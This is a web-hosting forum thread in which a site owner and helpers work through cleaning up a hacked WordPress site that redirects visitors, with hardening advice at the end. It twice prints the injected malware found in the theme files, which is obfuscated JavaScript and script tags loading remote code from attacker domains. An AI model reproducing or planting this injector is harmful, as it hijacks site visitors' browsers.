Wordpress site hacked on ISPConfig 3 server and automatically redirects to another site

Discussion in 'General' started by onastvar, May 2, 2020.

  1. onastvar

    onastvar Member

    Thanks @nhybgtvfr I will try your suggestion
     
  2. Steini86

    Steini86 Active Member

    If this string is not in the files (did you have a look in the hidden .htaccess files?) and not in the database, but your broswer is still forwarding in a fresh private mode then there is some other caching going on (maybe on the server). Try restarting php-fpm and apache/nginx
     
    onastvar likes this.
  3. onastvar

    onastvar Member

    Thanks again @Steini86!
    .htaccess file looks normal, compared with one from another website. I restarted php-fpm and apache, tried private mode, still same issue (redirects).
     
  4. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    don't rely on just searching for the string 'stivenfernando'
    although you should search for that as well, but you should search for it in EVERY file, as I said before, it could be in any file, even something that looks like an image file.

    that's why you also need to search for strings like 'eval' 'base64' 'decode' because the whole redirect url could be broken up and hidden across multiple files as little bits of gibberish, it's only when all those bits are combined and decoded that you get something readable.

    you'd need to look at each one you find manually and work out based on what file it's in, where in the file it is, what the rest of the file is like, what the other files around it are for, etc to work out in context if it's likely to be a legitimately encoded bit of script/variable, or something malicious.

    it's also possible that the searched for string no longer even exists on your site, their could be a different string that takes you to another site completely, that rapidly redirects you through a sequence of other sites to the ultimate destination site, just to make it a real bugger to work out what you actually need to look out for.
     
  5. onastvar

    onastvar Member

    Yes, after I enter mydomain.com I can see 5 switches/redirects of URLs until final site is reached.
     
  6. onastvar

    onastvar Member

    I just found following inside of theme javascript folder
    /web/wp-content/themes/enfold/js/avia.js
    /web/wp-content/themes/enfold/js/shortcodes.js
    var hjt689ig9 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61,52,52,52); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }var gfhfghfhfgj = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,50,46,48,46,48); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }

    after i deleted it, mydomain.com now redirects to only 1 URL (used to be 5)
    https://joinsilverclubbb.com/?p=mvstqmjwmy5gi3bpgeztmoa&sub2=boling5

    Is it safe to replace all javascript files with fresh ones?
     
    Last edited: May 4, 2020
  7. onastvar

    onastvar Member

    i tried to decode above and it shows URL
    https://stat.trackstatisticsss.com/j.js?v=444
    which is what i see after I enter mydomain.com

    So I have to clean all of the files with malicious code from previous post.
    Also, when I grep "String.fromCharCode" i get a lot of files (it's too many and unreadable)
    Any other advice how to clean up malicious code?
     

    Attached Files:

  8. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    to make it a bit easier, any themes/plugins that you think are infected. download the plugin as a zip file from the source, ie wordpress.org, or from the developers website or market site, envato/codecanyon/themeforest etc.
    you can then unzip the folder elsewhere and compare the files.
    you should do this if you think there are customisations in there that the designer made.
    otherwise just delete the plugin/theme folder and upload the new one, don't delete it from within wordpress or you might lose all the configuration.

    if there's any wordpress files your not sure about you can do the same version of wordpress and extract that to compare them.


    welcome to the wonderful world of cleaning up after clients who don't keep their wordpress installs up-to-date. :rolleyes:
     
    onastvar likes this.
  9. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    A quick thing you could try which may or may not help is setup a clean wordpress site (eg. on another domain/subdomain/somewhere) with wordfence installed, then copy all the /web files from this site to a subdirectory under the other site and run a scan. I think (not 100% positive) it is able to identify multiple wordpress installs in subdirectories like that, and as such I'd guess (complete guess!) it could scan and attempt to fix that installation as well. Wordfence will clean up a lot of the injected scipts and lets you compare/replace files with the originals for core and known themes/plugins. I'd be very surprised if they also read wp-config.php and tried to clean up the database from the other install, but who knows, maybe you'd get lucky.
     
    onastvar likes this.
  10. onastvar

    onastvar Member

    @jesse Norrell Thank You. I was able to install new wordpress in subfolder, installed wordfence, moved hacked wordpress site to "infected" subfolder. Wordfence scanned & found following malicious code in 900+ files.

    Couple of questions:
    1) What core Wordpress files I can replace without losing data/settings?
    2) Is there a command I can use to remove malicious code from 900+ files


    *.js files have the following malicious code
    var hjt689ig9 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61,52,52,52); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }var gfhfghfhfgj = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript';
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,50,46,48,46,48); s.src=pl;
    if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    var list = document.getElementsByTagName('script');list.insertBefore(s, list.childNodes[0]);
    }

    *.php files have the following malicious code

    script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>
     
  11. onastvar

    onastvar Member

    Thanks again!

    I can replace files, I just wanna make sure I don't loose any settings or data (bookly plugin on this site has 3 years of data, appts, customers, etc.).

    What's your suggestion?
     
  12. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    you shouldn't lose any settings. they should all be in the database.
    some plugins have a habit of having full filepaths embedded in them, but that should be easy to find, they'll end up throwing up errors about can't find some file/function in the /log/error.log
    you can always just copy your whole site to the /private folder as a backup, and then just replace all the files as necessary.
    if you do lose any settings/functionality, you can still check the backup copy for any file changes or missing files.
     
  13. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    To rephrase @nhybgtvfr's answer, "all of them".

    Wordfence can generally do that, is there a "fix" button in the scan results?

    Note that wordfence does a wonderful job of finding known files which have been modified (ie. the 900+ you have) - it will also attempt to find bad stuff in other ("unknown") files, and this doesn't work nearly as well, for obvious reasons. Most hacked sites have numerous compromises, and in my experience you'll probably still have some things that wordfence doesn't catch which you'll need to find and clean up manually.
     
  14. onastvar

    onastvar Member

    Wordfence does not give me FIX button option. I'll probably have to manually replace INFECTED / all files.
     
  15. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    Just checking, it's actually "REPAIR" (with the magic wand icon), but it's possible it only does that for files in a default location which it can replace with the original. It was worth a try...
     
    onastvar likes this.
  16. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    onastvar and Th0m like this.
  17. Jesse Norell

    Jesse Norell Well-Known Member Staff Member Howtoforge Staff

    onastvar likes this.
  18. onastvar

    onastvar Member

    Thanks everyone for all of the advice.
    I was able to restore/fix hacked wordpress website using following steps:

    1) I installed new Wordpress website, in a subfolder NEW of main INFECETED website (mydomain.com/new/)
    1a) Modified .htaccess to use subfolder NEW

    ##<IfModule mod_rewrite.c>
    ## RewriteEngine On
    ## RewriteCond %{HTTP_HOST} ^mydomain.com$ [OR]
    ## RewriteCond %{HTTP_HOST} ^mydomain.com$
    ## RewriteRule (.*)$ https://mydomain.com/new/$1 [R=301,L]
    ##</IfModule>

    2) Installed (5) original Plugins I had
    4) Installed Wordfence plugin
    5) Adjusted setting in Wordfence plugin to scan subfolders
    6) Copied all of the website files of HACKED website into subfolder (mydomain.com/new/infected)
    7) Wordfence 1st scan found 984 php & js malicious files in folder (mydomain.com/new/infected)
    8) Replaced entire folders (wp-admin & wp-includes) from original wordpress download to (mydomain.com/new/infected)
    9) Wordfence 2nd scan found 528 php & js malicious files (mydomain.com/new/infected)
    10) Replaced subfolders & files of (mydomain.com/new/infected/wp-content/themes & mydomain.com/new/infected/wp-content/plugins)
    11) Wordfence 3rd scan found 29 php & js malicious files (mydomain.com/new/infected)
    12) Replaced subfolders & files of (mydomain.com/new/infected/wp-content/uploads & ydomain.com/new/infected/index.php)
    13) Wordfence 4th scan found 0 php & js malicious files (mydomain.com/new/infected)
    14) Moved all the files from (mydomain.com/new/infected) to (mydomain.com/)
    15) Installed Wordfence plugin, scanned one more time, no issues.

    I was lucky DB was not hacked, all the settings, data, etc were intact.

    Probably a lot of extra steps, but I wanted to be on the safe side and did not want to to lose any data.
    I hope this helps someone.
     
  19. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    there were quite a lot of additional steps in that.

    all you really needed to do was install a fresh clean wordpress in the subfolder and change .htaccess as you did.
    install the same theme, and plugins as on your original site (fresh downloads from wordpress/developers sites)
    install and configure wordfence.
    do a full scan of this new site in wordfence to confirm it's all clean.

    then all you should need to worry about is the contents of the database and the wp-contents folder, and even then, you should be able to ignore most of wp-contents.
    plugins you've already sorted, mu-plugins should also be sorted if it existed and you've already re-installed those plugins fresh on the new install. upgrade, and cache folders can be ignored. really the only folder in the original site you should need to copy over to the new install is uploads. do that, scan it, clean it. then it's just the db to scan/clean.

    you should check the original wp-config.php and .htaccess files for any custom settings, db prefixes etc you want to keep, and recreate those in the new install. change the password for the original db. then delete all of the old site, and copy the new install into the parent folder.


    there's other things you can do to make it more secure, eg move wp-config.php to into /private and give it a random filename so it's function isn't obvious. create a new wp-config.ph in /web, containing:
    Code:
    <?php
    include __DIR__ . '../../private/<randomfilename>';
    ?>
    
    you can add this to your .htaccess
    Code:
    <files wp-config.php>
    order allow,deny
    deny from all
    </files>
    <files ~ "^.*\.([Hh][Tt][Aa])">
    order allow,deny
    deny from all
    satisfy all
    </files>
    
    # Block WordPress xmlrpc.php requests
    <Files xmlrpc.php>
    order deny,allow
    deny from all
    </Files>
    # Block wp-includes folder and files
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^wp-admin/includes/ - [F,L]
    RewriteRule !^wp-includes/ - [S=3]
    RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
    RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
    RewriteRule ^wp-includes/theme-compat/ - [F,L]
    </IfModule>
    # BEGIN block author scans
    RewriteEngine On
    RewriteBase /
    RewriteCond %{QUERY_STRING} (author=\d+) [NC]
    RewriteRule .* - [F]
    # END block author scans
    
    you can also put this in .htaccess in uploads
    Code:
    <Files *.php>
    deny from all
    </Files>
    
    you can include .js files etc, if you think someone may be uploading and running them there.

    you could also try 'Options -ExecCGI' but that could stop some things that you want working.
     
    onastvar likes this.

Share This Page